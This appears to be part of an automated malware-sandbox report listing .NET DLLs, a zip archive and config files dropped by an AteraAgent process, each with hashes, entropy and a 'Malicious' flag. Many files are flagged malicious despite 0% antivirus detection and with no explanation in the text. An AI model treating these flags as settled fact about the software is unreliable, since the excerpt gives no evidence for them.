                                                                                                                                                                                                                                                                                                                                  SHA-256:871D9403D045F94FC433907E49B68894764FCAF81E12FBDE2AC7A08642DDA32C
                                                                                                                                                                                                                                                                                                                                  SHA-512:5FCB9BDA9C857BA1AD2EC0B19AD109AC54BAC91B8F8F00968560623C8AFD01FAEE1078F7C76010C7526A37C46EE0DB74A0E0DB151186F8FB220105F7091FA69B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):149552
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.059724018456156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:o/S+nps5/3oat9QrwQmUgs0giOBDQntBBGBBKBUkBBXBBgBBFBUABU1BB0BBBBgB:o/S+nps5/3f9Qrdd5EtBBGBBKBUkBBXh
                                                                                                                                                                                                                                                                                                                                  MD5:2FF31980FD256EF1B1E143D4699BB727
                                                                                                                                                                                                                                                                                                                                  SHA1:608A21DA2B243E63DAD9E36EE84BC38C921F8E77
                                                                                                                                                                                                                                                                                                                                  SHA-256:F34AD6FB7847A85ADBE1492C783233A8A32BB5E96972FA3738538CE20513F682
                                                                                                                                                                                                                                                                                                                                  SHA-512:2FEF83A7668D190297863592FBBC8E766042067138C3A163771CDCF1FB284BC8162EA6B7B958CB076B6AB654216B855324AE292F78931C47EDC33B52376943AD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.334370226233819
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:Bn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCw:BnvXYcIh6yFIFBYpc47Hxn
                                                                                                                                                                                                                                                                                                                                  MD5:A964D6B5F323E343E884A1E4EBBA21A3
                                                                                                                                                                                                                                                                                                                                  SHA1:41FEA32C2FCC56070CF904AB441019F963C83ED5
                                                                                                                                                                                                                                                                                                                                  SHA-256:0214D2C78CC1DBE92853305FA12119BBE09EA06B5EB9C4B4E7AD76B6FAF232ED
                                                                                                                                                                                                                                                                                                                                  SHA-512:3E93C094D3B9D77BAE9C1725B452743FDFA0A20EB07FFC50EA861C501821710A2C29197CF43DCEC1BF089A5BC9B8F2BF57F9FD0EC8D9805D00E32538D03CD46C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):73264
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.955083228632948
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:R784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRX:R7N1r9KGI04CCARLX
                                                                                                                                                                                                                                                                                                                                  MD5:FA432B69828C0F175E44B367AF91ED2D
                                                                                                                                                                                                                                                                                                                                  SHA1:C0E72D5C64E9B560311EBD1EC3A35CED46386C78
                                                                                                                                                                                                                                                                                                                                  SHA-256:6718AFA55EF89805B69360C9E88347A39CC302AB3C16590E78136C20DB025613
                                                                                                                                                                                                                                                                                                                                  SHA-512:E0C54D9126C557C24013486A31D5477EFF2B800ADAE472C3103EE1F1CD527546E6DCEFB19D5DCE602AEE6DA7A0290F413CE2C6C09DF28D4333C4E62510FE2064
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1246506
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999702247108497
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:Ony3ipTOpSfZauTZ0OH58yGrxiVj3WqHvYfUmanGGJFE:OnaSOpGoud0OHGliZWqH3bn/E
                                                                                                                                                                                                                                                                                                                                  MD5:E74D2A16DA1DDB7F9C54F72B8A25897C
                                                                                                                                                                                                                                                                                                                                  SHA1:32379AF2DC1C1CB998DC81270B7D6BE054F7C1A0
                                                                                                                                                                                                                                                                                                                                  SHA-256:A0C2F9479B5E3DA9D7A213EBC59F1DD983881F4FC47A646FFC0A191E07966F46
                                                                                                                                                                                                                                                                                                                                  SHA-512:52B8DE90DC9CA41388EDC9AE637D5B4CE5C872538C87CC3E7D45EDCF8EFF78B0F5743AB4927490ABDA1CFF38F2A19983B7CCC0FE3F854B0EACCA9C9CE28EDA75
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):37936
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.42035670242574
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:GlK72yzFcoUzzxYeHTxwx6/ufD/EpYinAMxCoG:3e9YeHVwYe47Hx6
                                                                                                                                                                                                                                                                                                                                  MD5:EFB4712C8713CB05EB7FE7D87A83A55A
                                                                                                                                                                                                                                                                                                                                  SHA1:C94D106BBA77AECF88540807DA89349B50EA5AE7
                                                                                                                                                                                                                                                                                                                                  SHA-256:30271D8A49C2547AB63A80BC170F42E9F240CF359A844B10BC91340444678E75
                                                                                                                                                                                                                                                                                                                                  SHA-512:3594955AD79A07F75C697229B0DE30C60C2C7372B5A94186A705159A25D2E233E398B9E2DC846B8B47E295DCDDD1765A8287B13456C0A3B3C4E296409A428EF8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1295
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.018953579697613
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JdArdEtPF7NhOXrRH2/BLVv+13vH2/nVQ7uH2/FV0PH2/+w39y:3Ar+z7O7Rgdp+1/gnSagFsg+w3w
                                                                                                                                                                                                                                                                                                                                  MD5:843D2196B96E53ABCAE6F4C243D1A7A6
                                                                                                                                                                                                                                                                                                                                  SHA1:EB28441616660FD53653999595A3309961AA9A54
                                                                                                                                                                                                                                                                                                                                  SHA-256:175C1EBF4B5C56563944E65C9E8AE4595730155D69854499DB638E82E16DF056
                                                                                                                                                                                                                                                                                                                                  SHA-512:2C24DA122963E1BF533FD8A5C841C9BCD86442E0E49D3BE379FBB21AA607FDC6C7D30BA5573615416D55538429652BF1108D88EC8267FDC5D8C8F9ECAF11D0A1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-12.0.0.0" newVersion="12.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.9.1.0" newVersion="2.9.1.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhUnn:Wu
                                                                                                                                                                                                                                                                                                                                  MD5:5EDA46A55C61B07029E7202F8CF1781C
                                                                                                                                                                                                                                                                                                                                  SHA1:862EE76FC1E20A9CC7BC1920309AA67DE42F22D0
                                                                                                                                                                                                                                                                                                                                  SHA-256:12BF7EB46CB4CB90FAE054C798B8FD527F42A5EFC8D7833BB4F68414E2383442
                                                                                                                                                                                                                                                                                                                                  SHA-512:4CF17D20064BE9475E45D5F46B4A3400CDB8180E5E375ECAC8145D18B34C8FCA24432A06AEEC937F5BEDC7C176F4EE29F4978530BE20EDBD7FED38966FE989D6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=1.6
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):102448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.190700491174632
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:hPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OL87HxBg:h2bYbYSWd85I5sSakFQhHL8/g
                                                                                                                                                                                                                                                                                                                                  MD5:266A4736FE6DFEADBC40C66AF39D3871
                                                                                                                                                                                                                                                                                                                                  SHA1:D090E63810691F78F760E55640B81958BC715183
                                                                                                                                                                                                                                                                                                                                  SHA-256:4D6091013BF285AF05D901BA130E86D8CEFDB4E387540C3814929C1277C2DDF8
                                                                                                                                                                                                                                                                                                                                  SHA-512:AB43966CEFC08A8FE9B7A1787948F55A73B243CA6DE7259FD42E5BD4ABAE61D562C9642770708BA38AB6118D3755741529ED51E7DB2A8A811BE8B876F2922A8B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):95280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.998846079851237
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:GiLY8I1pq2jBTn9kbf0KNGVIYMcoS1JkEX5g7Hxlv:LZ0PMcjrgv
                                                                                                                                                                                                                                                                                                                                  MD5:C6339BD38794C9EB831004955DE64D16
                                                                                                                                                                                                                                                                                                                                  SHA1:EAE04876F94347538735F853B7F14778CB75180F
                                                                                                                                                                                                                                                                                                                                  SHA-256:855D0323807390D8F499355D0030685FBD6DC6939218A15059CB3E9C744AB1A4
                                                                                                                                                                                                                                                                                                                                  SHA-512:F62F76F305285F1C206AEFB8418E48BD2074DEC768C16986353305F34D17524E9A9AEA29AAE11B0D927247161F21039933B3EA68F2BC7F40623B471E123B33F7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.408406581403349
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:hQMnMYnUFMSptE7C+t2RO3neZN8752vwzE8Kku6ZFMLcyMmEpYinAMxCl5E:h9MYn1seLE8JFMLcyMH7Hx+E
                                                                                                                                                                                                                                                                                                                                  MD5:7F8418A330DA75F653CC1A50F0B91175
                                                                                                                                                                                                                                                                                                                                  SHA1:7448DCCCDB8FBB1CC827FFE4861C7BD529EE85F5
                                                                                                                                                                                                                                                                                                                                  SHA-256:BF780EB84424039CAB84C818D21A402369EC1BDC9136E1CDBB60486343A07723
                                                                                                                                                                                                                                                                                                                                  SHA-512:3CAC7066B3F210D826383CA000CDC581C0CA193800C97F2F34C6139BB4880A12A485604344EF22BADFD4609F2A0E7645E81DECFA8C5BF8C6DF4406BFEE6DBFDA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):354352
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1536791121281995
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:4r/iEF3zTxesPlx5zIAUH+2n8G4smIkuxhnCq7a/ZmvYyD:4hpp9xxIBeXGfvYyD
                                                                                                                                                                                                                                                                                                                                  MD5:697D8BC281B58B1FCEEC721B9BC01059
                                                                                                                                                                                                                                                                                                                                  SHA1:DA468B41FDADE096896B6835645DEFF110F438F5
                                                                                                                                                                                                                                                                                                                                  SHA-256:82C4EFE948B812C844DE4950130C292CDC49EDA42F447E17DE6CC451A1F5135E
                                                                                                                                                                                                                                                                                                                                  SHA-512:95877A2E690E083B256F71E376BE757FA0D329A6AAEC193461D325C63867BCE9E72A648EDB17A8817198C5224853541C65F664A6FFB966AE35D9E558F681EF46
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):883760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.071511091364285
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:m1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQ0:m1n1p9LdRN39aQZUq1
                                                                                                                                                                                                                                                                                                                                  MD5:1A5AE803BFFDEBA6B4D9825233D1C23C
                                                                                                                                                                                                                                                                                                                                  SHA1:E324D9B2F417F46FE3364658429B620BC5942322
                                                                                                                                                                                                                                                                                                                                  SHA-256:2BED7E5890D572E41770C422C25CF11F0D3C2D170C5F38F8EB1535E1A3E614C6
                                                                                                                                                                                                                                                                                                                                  SHA-512:D8DCB1E227AD001A2F43C9847E0A22D43DBE7021814AB88DBD168092A3C172D17CB69848F743166E755DB771B55025664C0E53580B9E48252B1581AD281E332A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):702512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.943194897994663
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:3f9WGsSVSM2mxL2nRiOr8gUckc6V/g2GhBzj05cH3:vXNL2PVh6B+BzjmcX
                                                                                                                                                                                                                                                                                                                                  MD5:F78DB2C6B247E0FFC215A44AE88178D8
                                                                                                                                                                                                                                                                                                                                  SHA1:12FB14AE1CF731115F07076AD939A2ACC57A9920
                                                                                                                                                                                                                                                                                                                                  SHA-256:1DFF434970F52326AA5E0C1164AB76A771A1EE651E37166DF8A3BC3F06204746
                                                                                                                                                                                                                                                                                                                                  SHA-512:AF3F67FA56CA89111E389DE17F9030D979827E8B60AF86E991115B07759D6DADA1B74ED870B5163474192BF58A5FA69EBFB03DFCF087EB88E1E72EC26BB578CB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):285744
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.190004154231823
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:uZAWecOmop6I4A9YzsRuBeXirS9/pcRykxxNKKV6S8mSrpsPngH:uZeZ6ANRIru9/pcMkoKV64SrWA
                                                                                                                                                                                                                                                                                                                                  MD5:2CD03F275D3BB90B106632F203DCAF64
                                                                                                                                                                                                                                                                                                                                  SHA1:025C716D6B123FA03DC9F97D4BF77D4AF20B75AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:B90619EBE88644BDA995505BDE5D5E282403E27FF7A55E273CC2FF9ACC88300A
                                                                                                                                                                                                                                                                                                                                  SHA-512:321660D33F6126077D4DC04AFBB341B9D46D07E2B38CF45F1C7B2C8B60A58A3F008390EE6F8B6995BECF4B0EADF66C9263D4BE67C8269F9A0851207650B9632D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):284208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.117448325022863
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:/ZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xH9:Bgo0WPVTXgd
                                                                                                                                                                                                                                                                                                                                  MD5:BF59A9BBF620C0F06ED79180C868FCE0
                                                                                                                                                                                                                                                                                                                                  SHA1:2E8F9EF7A105A951790344A3B9ADC61DB35ABAAD
                                                                                                                                                                                                                                                                                                                                  SHA-256:CEBDB552DAC9E136F87E37A461B7683934F00AA2A74FBA15BC53ADFA38F1B79E
                                                                                                                                                                                                                                                                                                                                  SHA-512:C472376BD7A0E532CB8FDDA7ADDB00FB973D30F97368460929E8352C16BCB17EA92264C81E1E1E084566172ECE3D1513073D24B01990A808335D0C040039C6D3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22064
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.678227546122444
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Xy/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqq/dW:XuhMaVmzDC67EpYinAMxCwk
                                                                                                                                                                                                                                                                                                                                  MD5:181F16CCEBD4B02ACE42A02CC536ACA9
                                                                                                                                                                                                                                                                                                                                  SHA1:84795DA0255E288C96AC64F1C8150E81E0289FFD
                                                                                                                                                                                                                                                                                                                                  SHA-256:80582DBDE89A6D9906721AD27562C7B2BEDE7048E4D461828D3BA2C4438E58E9
                                                                                                                                                                                                                                                                                                                                  SHA-512:73F93A3F4538FCE421A453B5A90AC662CC58D5A846AFECB8E337F33A1D643A81C8D02F5F3AECAE4CF00828A3103C63614F086E92ABD262317B13CF608784D72A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.235108733243218
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:bzpj9H0/bvvmNAkkOMo/23e3vggrkrD9Bxjpm2yuIFLlHTUpa/hDXEpYinAMxCWC:bzpjF0/t043e3vggr83jMYa/hU7HxVJU
                                                                                                                                                                                                                                                                                                                                  MD5:30BD9DF0841299E8FA11340B83A441B0
                                                                                                                                                                                                                                                                                                                                  SHA1:36447785062CB3DFDF9A1E03548EFD348760458F
                                                                                                                                                                                                                                                                                                                                  SHA-256:801BB92AA7A8840148FE548ECE4B7291C0E4FA73712FE2497074C925ECC906B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:830B821EE5BF401A6B95662EE191FC8BF08BF64D4D8BFBDB0E142D303AB241C41C4134883C0851B4D5DAF49F598454CE33595787C7084B4F9504794D9B07E54B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.179673461309118
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:MP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8Ily:Mh0qjC5RMOHO420kN1Z
                                                                                                                                                                                                                                                                                                                                  MD5:37C069A058DC803C83C43DF6681907DA
                                                                                                                                                                                                                                                                                                                                  SHA1:ED522080452C472560A74F4B979BDC5CFE1643E7
                                                                                                                                                                                                                                                                                                                                  SHA-256:9CD89ED91343ABF19DEF9EE1809AC28765EB3D63E5597583D3D183156D8B3C62
                                                                                                                                                                                                                                                                                                                                  SHA-512:1F38E4153FBFF9C996C3348A325AC3E9B43118D97F5E51B1099D09C61BFC4D772ADE110603D479403317AD76AD42F494E55A58E278F825EFBFA6E1ABEE246929
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.674524887219165
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Hh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBr882HW:Hy9eEpYinAMxCAT2HW
                                                                                                                                                                                                                                                                                                                                  MD5:3D126403FBA7BC6FAC6E6ABF5FCE09E8
                                                                                                                                                                                                                                                                                                                                  SHA1:70B60D649EB174C109C0A6DC873444473D956694
                                                                                                                                                                                                                                                                                                                                  SHA-256:D2B815734C2683E7759DEEA3019FCD2B19F5B879CFA3BA02620619DBCAF73E38
                                                                                                                                                                                                                                                                                                                                  SHA-512:BC0D56E79471051228DB678AC686BE96BEA6697C2376AE28574EDBAD52CF827AE720A7F733B6FE96B2757610771137B6E6A6CF86B787128136D17B232F09569D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
